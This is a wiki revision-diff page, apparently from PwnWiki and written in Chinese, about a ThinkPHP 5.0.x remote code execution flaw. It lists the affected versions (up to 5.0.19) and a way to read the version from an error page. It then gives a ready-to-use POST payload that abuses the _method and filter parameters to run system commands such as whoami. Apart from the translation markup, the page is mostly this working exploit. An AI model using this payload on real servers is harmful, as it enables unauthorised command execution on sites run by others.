Difference between revisions of "ThinkPHP 5.0.13 代碼執行漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==影響版本== </translate> ThinkPHP <= v5.0.19 <translate> ==漏洞利用== </translate> <translate> 通過報錯確定ThinkPHP版本: </trans...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==影響版本== | + | ==影響版本== <!--T:1--> |
</translate> | </translate> | ||
ThinkPHP <= v5.0.19 | ThinkPHP <= v5.0.19 | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:2--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
通過報錯確定ThinkPHP版本: | 通過報錯確定ThinkPHP版本: | ||
</translate> | </translate> | ||
| Line 22: | Line 23: | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
post發送數據: | post發送數據: | ||
</translate> | </translate> | ||
Latest revision as of 12:47, 3 July 2021
影響版本
ThinkPHP <= v5.0.19
漏洞利用
通過報錯確定ThinkPHP版本:
http://127.0.0.1/tk5/public/index.php/111
Payload
http://127.0.0.1/tk5/public/index.php
post發送數據:
s=whoami&_method=__construct&method=&filter[]=system